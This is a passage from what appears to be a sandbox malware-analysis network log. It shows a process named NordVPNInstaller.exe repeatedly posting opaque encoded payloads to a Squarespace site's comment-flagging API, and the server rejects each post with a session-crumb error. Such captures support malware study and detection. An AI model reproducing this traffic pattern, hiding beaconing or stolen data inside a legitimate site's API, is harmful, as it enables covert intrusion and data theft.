=pSa/hOp4xANlY9i3c6%2Bym1NpbeWMtgWci4Cb4T7OLB%2BOUEmVOMcsytHEhRrbKYqdxScP%2B0ny%2BLtWdDHzy8b8xPgrPmONh7PWe8a39Q0g2y151cvIVOF9i5ZmU1B7FGPoGeGaTx48ikVZ9X9RGPEyEOwNPnJZ97wz/dw9Ac/NNpLf6z4VyGURWpYHMFdkWNtzjeYq0gzwhaMAzHMS2VX5VLmjmJEH25eLfXlEVanmRgFylt3gWOLOUD
2024-09-01 19:56:25 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:25 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BVAIFZPwXP3kYWJhMTFhMzNmYWRhNzI2Y2Q1Mzk3YTZmYzg4OTQx; Path=/; Secure Set-Cookie: crumb=BeoxIwJpTM-1N2Q2OGIyMTg0YTViNjljNTAyMDM3MTU2ZmVhMzk1; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: S0Zy70wu/dWpKLVvM Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BeoxIwJpTM-1N2Q2OGIyMTg0YTViNjljNTAyMDM3MTU2ZmVhMzk1"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	49782	198.185.159.177	443	3524	C:\Users\user\Desktop\NordVPNInstaller.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:26 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 324 Expect: 100-continue
2024-09-01 19:56:26 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:26 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:26 UTC	323	OUT	Data Raw: 3d 66 4c 74 30 72 76 63 61 63 36 34 25 32 42 45 48 38 71 74 46 37 73 59 45 33 62 79 6b 47 48 39 58 25 32 42 7a 78 63 35 4b 38 35 54 4c 75 7a 54 62 6d 6e 38 66 75 34 31 70 34 2f 6d 53 6f 44 4b 76 6b 66 5a 31 50 52 7a 48 6e 43 31 4a 70 35 6e 45 59 67 74 73 4e 77 6a 68 4d 61 71 4a 37 35 75 4a 46 44 67 6a 62 67 77 73 33 78 48 48 39 4c 46 62 61 25 32 42 76 49 39 66 41 51 6d 5a 49 77 6d 6f 45 6b 68 47 37 37 2f 42 6f 65 30 4f 5a 72 62 4b 6a 78 36 66 62 68 66 34 77 32 39 32 5a 73 79 37 64 35 56 72 52 62 6c 38 58 31 39 75 4e 38 73 6a 6d 32 73 32 68 31 72 39 4c 45 54 5a 45 47 2f 4d 6f 72 42 56 4e 33 33 67 31 53 51 4b 45 5a 72 44 72 36 45 35 55 41 46 67 30 65 53 5a 59 46 7a 7a 77 65 70 64 57 68 74 39 45 51 47 6c 6c 69 6f 6f 56 6d 41 6b 72 6c 25 32 42 2f 48 77 69 33 Data Ascii: =fLt0rvcac64%2BEH8qtF7sYE3bykGH9X%2Bzxc5K85TLuzTbmn8fu41p4/mSoDKvkfZ1PRzHnC1Jp5nEYgtsNwjhMaqJ75uJFDgjbgws3xHH9LFba%2BvI9fAQmZIwmoEkhG77/Boe0OZrbKjx6fbhf4w292Zsy7d5VrRbl8X19uN8sjm2s2h1r9LETZEG/MorBVN33g1SQKEZrDr6E5UAFg0eSZYFzzwepdWht9EQGlliooVmAkrl%2B/Hwi3
2024-09-01 19:56:26 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:26 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BYM6Z0MNX6AfZGVkN2RjMGU0MWZhYjAzYzIzOTU1MDI4Yzg2NDky; Path=/; Secure Set-Cookie: crumb=Bcu8l64RiMwxNDMyYWM4NDBkYzA3ZmM1OWI0NWY2ZTE0MjA2MTQ5; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: sM0OrtUN/mzAFpE7h Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"Bcu8l64RiMwxNDMyYWM4NDBkYzA3ZmM1OWI0NWY2ZTE0MjA2MTQ5"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	49783	198.185.159.177	443	3524	C:\Users\user\Desktop\NordVPNInstaller.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:26 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 19:56:26 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:26 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:26 UTC	279	OUT	Data Raw: 3d 70 53 61 2f 68 4f 70 34 78 41 4e 6c 59 39 69 33 63 36 25 32 42 79 6d 31 4e 70 62 65 57 4d 74 67 57 63 69 34 43 62 34 54 37 4f 4c 42 25 32 42 4f 55 45 6d 56 4f 4d 63 73 79 74 48 45 68 52 72 62 4b 59 71 64 78 53 63 50 25 32 42 30 6e 79 25 32 42 4c 74 57 64 44 48 7a 79 38 62 38 78 50 67 72 50 6d 4f 4e 68 37 50 57 65 38 61 33 39 51 30 67 32 79 31 35 31 63 76 49 56 4f 46 39 69 35 5a 6d 55 31 42 37 46 47 50 6f 47 65 47 61 54 78 34 38 69 6b 56 5a 39 58 39 52 47 50 45 79 45 4f 77 4e 50 6e 4a 5a 39 37 77 7a 2f 64 77 39 41 63 2f 4e 4e 70 4c 66 36 7a 34 56 79 47 55 52 57 70 59 48 4d 46 64 6b 57 4e 74 7a 6a 65 59 71 30 67 7a 77 68 61 4d 41 7a 48 4d 53 32 56 58 35 56 4c 6d 6a 6d 4a 45 48 32 35 65 4c 66 58 6c 45 56 61 6e 6d 52 67 46 79 6c 74 33 67 57 4f 4c 4f 55 44 Data Ascii: =pSa/hOp4xANlY9i3c6%2Bym1NpbeWMtgWci4Cb4T7OLB%2BOUEmVOMcsytHEhRrbKYqdxScP%2B0ny%2BLtWdDHzy8b8xPgrPmONh7PWe8a39Q0g2y151cvIVOF9i5ZmU1B7FGPoGeGaTx48ikVZ9X9RGPEyEOwNPnJZ97wz/dw9Ac/NNpLf6z4VyGURWpYHMFdkWNtzjeYq0gzwhaMAzHMS2VX5VLmjmJEH25eLfXlEVanmRgFylt3gWOLOUD
2024-09-01 19:56:26 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:26 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BQNzLFPaWLHrZjQzMzcxYzk3NzU0YTgxMjEzODcyZGQ2NDk1Y2Fj; Path=/; Secure Set-Cookie: crumb=Bf07GaRfhgCOMTJkMTVlNGRjYmFiOWYwMmY0MmE3NjgzOTRlZDVl; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: rT7EsxGe/TBFFEp6j Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"Bf07GaRfhgCOMTJkMTVlNGRjYmFiOWYwMmY0MmE3NjgzOTRlZDVl"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	49785	198.185.159.177	443	3524	C:\Users\user\Desktop\NordVPNInstaller.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:27 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 19:56:27 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:27 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:27 UTC	279	OUT	Data Raw: 3d 70 53 61 2f 68 4f 70 34 78 41 4e 6c 59 39 69 33 63 36 25 32 42 79 6d 31 4e 70 62 65 57 4d 74 67 57 63 69 34 43 62 34 54 37 4f 4c 42 25 32 42 4f 55 45 6d 56 4f 4d 63 73 79 74 48 45 68 52 72 62 4b 59 71 64 78 53 63 50 25 32 42 30 6e 79 25 32 42 4c 74 57 64 44 48 7a 79 38 62 38 78 50 67 72 50 6d 4f 4e 68 37 50 57 65 38 61 33 39 51 30 67 32 79 31 35 31 63 76 49 56 4f 46 39 69 35 5a 6d 55 31 42 37 46 47 50 6f 47 65 47 61 54 78 34 38 69 6b 56 5a 39 58 39 52 47 50 45 79 45 4f 77 4e 50 6e 4a 5a 39 37 77 7a 2f 64 77 39 41 63 2f 4e 4e 70 4c 66 36 7a 34 56 79 47 55 52 57 70 59 48 4d 46 64 6b 57 4e 74 7a 6a 65 59 71 30 67 7a 77 68 61 4d 41 7a 48 4d 53 32 56 58 35 56 4c 6d 6a 6d 4a 45 48 32 35 65 4c 66 58 6c 45 56 61 6e 6d 52 67 46 79 6c 74 33 67 57 4f 4c 4f 55 44 Data Ascii: =pSa/hOp4xANlY9i3c6%2Bym1NpbeWMtgWci4Cb4T7OLB%2BOUEmVOMcsytHEhRrbKYqdxScP%2B0ny%2BLtWdDHzy8b8xPgrPmONh7PWe8a39Q0g2y151cvIVOF9i5ZmU1B7FGPoGeGaTx48ikVZ9X9RGPEyEOwNPnJZ97wz/dw9Ac/NNpLf6z4VyGURWpYHMFdkWNtzjeYq0gzwhaMAzHMS2VX5VLmjmJEH25eLfXlEVanmRgFylt3gWOLOUD
2024-09-01 19:56:27 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:27 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BY3yKPG_NLnFMDY1MGVmOTIxNzg1ZjA2NjFmMGQ0OGNhOGIwNWUw; Path=/; Secure Set-Cookie: crumb=BanWPn7FFaKoMDc4Y2ZkZjk0MjE0OWFmODYzYjllN2ZmYzBiZDUw; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: d4fVS3Aa/4IK15oOR Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BanWPn7FFaKoMDc4Y2ZkZjk0MjE0OWFmODYzYjllN2ZmYzBiZDUw"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	49784	198.185.159.177	443	3524	C:\Users\user\Desktop\NordVPNInstaller.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:27 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 19:56:27 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:27 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:27 UTC	279	OUT	Data Raw: 3d 70 53 61 2f 68 4f 70 34 78 41 4e 6c 59 39 69 33 63 36 25 32 42 79 6d 31 4e 70 62 65 57 4d 74 67 57 63 69 34 43 62 34 54 37 4f 4c 42 25 32 42 4f 55 45 6d 56 4f 4d 63 73 79 74 48 45 68 52 72 62 4b 59 71 64 78 53 63 50 25 32 42 30 6e 79 25 32 42 4c 74 57 64 44 48 7a 79 38 62 38 78 50 67 72 50 6d 4f 4e 68 37 50 57 65 38 61 33 39 51 30 67 32 79 31 35 31 63 76 49 56 4f 46 39 69 35 5a 6d 55 31 42 37 46 47 50 6f 47 65 47 61 54 78 34 38 69 6b 56 5a 39 58 39 52 47 50 45 79 45 4f 77 4e 50 6e 4a 5a 39 37 77 7a 2f 64 77 39 41 63 2f 4e 4e 70 4c 66 36 7a 34 56 79 47 55 52 57 70 59 48 4d 46 64 6b 57 4e 74 7a 6a 65 59 71 30 67 7a 77 68 61 4d 41 7a 48 4d 53 32 56 58 35 56 4c 6d 6a 6d 4a 45 48 32 35 65 4c 66 58 6c 45 56 61 6e 6d 52 67 46 79 6c 74 33 67 57 4f 4c 4f 55 44 Data Ascii: =pSa/hOp4xANlY9i3c6%2Bym1NpbeWMtgWci4Cb4T7OLB%2BOUEmVOMcsytHEhRrbKYqdxScP%2B0ny%2BLtWdDHzy8b8xPgrPmONh7PWe8a39Q0g2y151cvIVOF9i5ZmU1B7FGPoGeGaTx48ikVZ9X9RGPEyEOwNPnJZ97wz/dw9Ac/NNpLf6z4VyGURWpYHMFdkWNtzjeYq0gzwhaMAzHMS2VX5VLmjmJEH25eLfXlEVanmRgFylt3gWOLOUD
2024-09-01 19:56:27 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:27 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BUp3hEd78Xc8NGJmOWRhNDI5ODE1ZDc2MGUwYmY0ZjEzM2NjNGE0; Path=/; Secure Set-Cookie: crumb=BQJnVu7vN4t9MWVkZTYwNjNjNGJhMzE2NDQ1ZmFjODRjODI1ODA5; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: 8Csp1NpB/YfzjAVr0 Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BQJnVu7vN4t9MWVkZTYwNjNjNGJhMzE2NDQ1ZmFjODRjODI1ODA5"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	49787	198.185.159.177	443	3524	C:\Users\user\Desktop\NordVPNInstaller.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:27 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 322 Expect: 100-continue
2024-09-01 19:56:27 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:27 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:27 UTC	321	OUT	Data Raw: 3d 66 4c 74 30 72 76 63 61 63 36 34 25 32 42 45 48 38 71 74 46 37 73 59 45 33 62 79 6b 47 48 39 58 25 32 42 7a 78 63 35 4b 38 35 54 4c 75 7a 54 62 6d 6e 38 66 75 34 31 70 34 2f 6d 53 6f 44 4b 76 6b 66 5a 31 50 52 7a 48 6e 43 31 4a 70 35 6e 45 59 67 74 73 4e 77 6a 68 4d 61 71 4a 37 35 75 4a 46 44 67 6a 62 67 77 73 33 78 48 48 39 4c 46 31 47 48 53 46 4a 47 36 4c 45 5a 49 77 6d 6f 45 6b 68 47 37 37 2f 42 6f 65 30 4f 5a 72 62 4b 6a 78 36 66 62 68 66 34 77 32 39 32 5a 73 79 37 64 35 56 72 52 62 6c 38 58 31 39 75 4e 38 73 6a 6d 32 73 32 68 31 72 39 4c 45 54 5a 45 47 2f 4d 6f 72 42 56 4e 33 33 67 31 53 51 4b 45 5a 72 44 72 36 45 35 55 41 46 67 30 65 53 5a 59 46 7a 7a 77 65 70 64 57 68 74 39 45 51 47 6c 6c 69 6f 6f 56 6d 41 6b 72 6c 25 32 42 2f 48 77 69 33 36 68 Data Ascii: =fLt0rvcac64%2BEH8qtF7sYE3bykGH9X%2Bzxc5K85TLuzTbmn8fu41p4/mSoDKvkfZ1PRzHnC1Jp5nEYgtsNwjhMaqJ75uJFDgjbgws3xHH9LF1GHSFJG6LEZIwmoEkhG77/Boe0OZrbKjx6fbhf4w292Zsy7d5VrRbl8X19uN8sjm2s2h1r9LETZEG/MorBVN33g1SQKEZrDr6E5UAFg0eSZYFzzwepdWht9EQGlliooVmAkrl%2B/Hwi36h
2024-09-01 19:56:28 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:27 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BU-g4i7BJ7RJZmE4N2M4Mzg3MmRmYmM5ZjMzNjI1MmQwOGVkNGI1; Path=/; Secure Set-Cookie: crumb=BfXRHqpNXwXOZDA3NDc0NWUyMjhmMDIzZTAwNmVjMjkwYzliY2M0; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: Bf7oMyXk/tGiea7QM Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BfXRHqpNXwXOZDA3NDc0NWUyMjhmMDIzZTAwNmVjMjkwYzliY2M0"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	49788	198.185.159.177	443	3524	C:\Users\user\Desktop\NordVPNInstaller.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:27 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 19:56:27 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:27 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:27 UTC	279	OUT	Data Raw: 3d 70 53 61 2f 68 4f 70 34 78 41 4e 6c 59 39 69 33 63 36 25 32 42 79 6d 31 4e 70 62 65 57 4d 74 67 57 63 69 34 43 62 34 54 37 4f 4c 42 25 32 42 4f 55 45 6d 56 4f 4d 63 73 79 74 48 45 68 52 72 62 4b 59 71 64 78 53 63 50 25 32 42 30 6e 79 25 32 42 4c 74 57 64 44 48 7a 79 38 62 38 78 50 67 72 50 6d 4f 4e 68 37 50 57 65 38 61 33 39 51 30 67 32 79 31 35 31 63 76 49 56 4f 46 39 69 35 5a 6d 55 31 42 37 46 47 50 6f 47 65 47 61 54 78 34 38 69 6b 56 5a 39 58 39 52 47 50 45 79 45 4f 77 4e 50 6e 4a 5a 39 37 77 7a 2f 64 77 39 41 63 2f 4e 4e 70 4c 66 36 7a 34 56 79 47 55 52 57 70 59 48 4d 46 64 6b 57 4e 74 7a 6a 65 59 71 30 67 7a 77 68 61 4d 41 7a 48 4d 53 32 56 58 35 56 4c 6d 6a 6d 4a 45 48 32 35 65 4c 66 58 6c 45 56 61 6e 6d 52 67 46 79 6c 74 33 67 57 4f 4c 4f 55 44 Data Ascii: =pSa/hOp4xANlY9i3c6%2Bym1NpbeWMtgWci4Cb4T7OLB%2BOUEmVOMcsytHEhRrbKYqdxScP%2B0ny%2BLtWdDHzy8b8xPgrPmONh7PWe8a39Q0g2y151cvIVOF9i5ZmU1B7FGPoGeGaTx48ikVZ9X9RGPEyEOwNPnJZ97wz/dw9Ac/NNpLf6z4VyGURWpYHMFdkWNtzjeYq0gzwhaMAzHMS2VX5VLmjmJEH25eLfXlEVanmRgFylt3gWOLOUD
2024-09-01 19:56:28 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:27 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BdOC5JUh_IjFNWI5NzhlZDI1NGY5ODA4MmYzZTE2NDVjNzQ3NGI1; Path=/; Secure Set-Cookie: crumb=BWkofjKeXqhROTZmYWI2NzBjNWNlY2ZiZTNhZTc1OWZiYjk2MzQ4; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: 0iI8u0z8/B3IKVqsk Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BWkofjKeXqhROTZmYWI2NzBjNWNlY2ZiZTNhZTc1OWZiYjk2MzQ4"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	49792	198.185.159.177	443	3524	C:\Users\user\Desktop\NordVPNInstaller.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:28 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 19:56:29 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:29 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:29 UTC	279	OUT	Data Raw: 3d 70 53 61 2f 68 4f 70 34 78 41 4e 6c 59 39 69 33 63 36 25 32 42 79 6d 31 4e 70 62 65 57 4d 74 67 57 63 69 34 43 62 34 54 37 4f 4c 42 25 32 42 4f 55 45 6d 56 4f 4d 63 73 79 74 48 45 68 52 72 62 4b 59 71 64 78 53 63 50 25 32 42 30 6e 79 25 32 42 4c 74 57 64 44 48 7a 79 38 62 38 78 50 67 72 50 6d 4f 4e 68 37 50 57 65 38 61 33 39 51 30 67 32 79 31 35 31 63 76 49 56 4f 46 39 69 35 5a 6d 55 31 42 37 46 47 50 6f 47 65 47 61 54 78 34 38 69 6b 56 5a 39 58 39 52 47 50 45 79 45 4f 77 4e 50 6e 4a 5a 39 37 77 7a 2f 64 77 39 41 63 2f 4e 4e 70 4c 66 36 7a 34 56 79 47 55 52 57 70 59 48 4d 46 64 6b 57 4e 74 7a 6a 65 59 71 30 67 7a 77 68 61 4d 41 7a 48 4d 53 32 56 58 35 56 4c 6d 6a 6d 4a 45 48 32 35 65 4c 66 58 6c 45 56 61 6e 6d 52 67 46 79 6c 74 33 67 57 4f 4c 4f 55 44 Data Ascii: =pSa/hOp4xANlY9i3c6%2Bym1NpbeWMtgWci4Cb4T7OLB%2BOUEmVOMcsytHEhRrbKYqdxScP%2B0ny%2BLtWdDHzy8b8xPgrPmONh7PWe8a39Q0g2y151cvIVOF9i5ZmU1B7FGPoGeGaTx48ikVZ9X9RGPEyEOwNPnJZ97wz/dw9Ac/NNpLf6z4VyGURWpYHMFdkWNtzjeYq0gzwhaMAzHMS2VX5VLmjmJEH25eLfXlEVanmRgFylt3gWOLOUD
2024-09-01 19:56:29 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:29 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BQtJof9lK1EZMWU4YjQyY2JkYmFlNzA3MjVkMzk5MGEwOTEwZTMw; Path=/; Secure Set-Cookie: crumb=Bb4PNUzscnKNMGJlOGQ3M2U2OTRiMmZjZjNkZGY3OTA1NTc4Yjg4; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: E46H9G20/tjojRxVg Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"Bb4PNUzscnKNMGJlOGQ3M2U2OTRiMmZjZjNkZGY3OTA1NTc4Yjg4"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.4	49793	198.185.159.177	443	3524	C:\Users\user\Desktop\NordVPNInstaller.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:29 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 19:56:29 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:29 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:29 UTC	279	OUT	Data Raw: 3d 70 53 61 2f 68 4f 70 34 78 41 4e 6c 59 39 69 33 63 36 25 32 42 79 6d 31 4e 70 62 65 57 4d 74 67 57 63 69 34 43 62 34 54 37 4f 4c 42 25 32 42 4f 55 45 6d 56 4f 4d 63 73 79 74 48 45 68 52 72 62 4b 59 71 64 78 53 63 50 25 32 42 30 6e 79 25 32 42 4c 74 57 64 44 48 7a 79 38 62 38 78 50 67 72 50 6d 4f 4e 68 37 50 57 65 38 61 33 39 51 30 67 32 79 31 35 31 63 76 49 56 4f 46 39 69 35 5a 6d 55 31 42 37 46 47 50 6f 47 65 47 61 54 78 34 38 69 6b 56 5a 39 58 39 52 47 50 45 79 45 4f 77 4e 50 6e 4a 5a 39 37 77 7a 2f 64 77 39 41 63 2f 4e 4e 70 4c 66 36 7a 34 56 79 47 55 52 57 70 59 48 4d 46 64 6b 57 4e 74 7a 6a 65 59 71 30 67 7a 77 68 61 4d 41 7a 48 4d 53 32 56 58 35 56 4c 6d 6a 6d 4a 45 48 32 35 65 4c 66 58 6c 45 56 61 6e 6d 52 67 46 79 6c 74 33 67 57 4f 4c 4f 55 44 Data Ascii: =pSa/hOp4xANlY9i3c6%2Bym1NpbeWMtgWci4Cb4T7OLB%2BOUEmVOMcsytHEhRrbKYqdxScP%2B0ny%2BLtWdDHzy8b8xPgrPmONh7PWe8a39Q0g2y151cvIVOF9i5ZmU1B7FGPoGeGaTx48ikVZ9X9RGPEyEOwNPnJZ97wz/dw9Ac/NNpLf6z4VyGURWpYHMFdkWNtzjeYq0gzwhaMAzHMS2VX5VLmjmJEH25eLfXlEVanmRgFylt3gWOLOUD
2024-09-01 19:56:29 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:29 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BbheZXusnMwnOWJiNGNlZmU4YWFhNTZjNzMyMGY1OGIzZmRlODFi; Path=/; Secure Set-Cookie: crumb=BUKA9D2Y_sXDYzc4ZThiZWJhODQwNzkzZjcxYmJmMTMxMGM2ZjI3; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: 6MyQGsY5/Wm0EHkUv Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BUKA9D2Y_sXDYzc4ZThiZWJhODQwNzkzZjcxYmJmMTMxMGM2ZjI3"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.4	49794	198.185.159.177	443	3524	C:\Users\user\Desktop\NordVPNInstaller.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:29 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 322 Expect: 100-continue
2024-09-01 19:56:29 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:29 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:29 UTC	321	OUT	Data Raw: 3d 66 4c 74 30 72 76 63 61 63 36 34 25 32 42 45 48 38 71 74 46 37 73 59 45 33 62 79 6b 47 48 39 58 25 32 42 7a 78 63 35 4b 38 35 54 4c 75 7a 54 62 6d 6e 38 66 75 34 31 70 34 2f 6d 53 6f 44 4b 76 6b 66 5a 31 50 52 7a 48 6e 43 31 4a 70 35 6e 45 59 67 74 73 4e 77 6a 68 4d 61 71 4a 37 35 75 4a 46 44 67 6a 65 55 6b 55 5a 66 50 61 55 57 31 54 66 72 43 38 51 58 4a 4c 35 5a 49 77 6d 6f 45 6b 68 47 37 37 2f 42 6f 65 30 4f 5a 72 62 4b 6a 78 36 66 62 68 66 34 77 32 39 32 5a 73 79 37 64 35 56 72 52 62 6c 38 58 31 39 75 4e 38 73 6a 6d 32 73 32 68 31 72 39 4c 45 54 5a 45 47 2f 4d 6f 72 42 56 4e 33 33 67 31 53 51 4b 45 5a 72 44 72 36 45 35 55 41 46 67 30 65 53 5a 59 46 7a 7a 77 65 70 64 57 68 74 39 45 51 47 6c 6c 69 6f 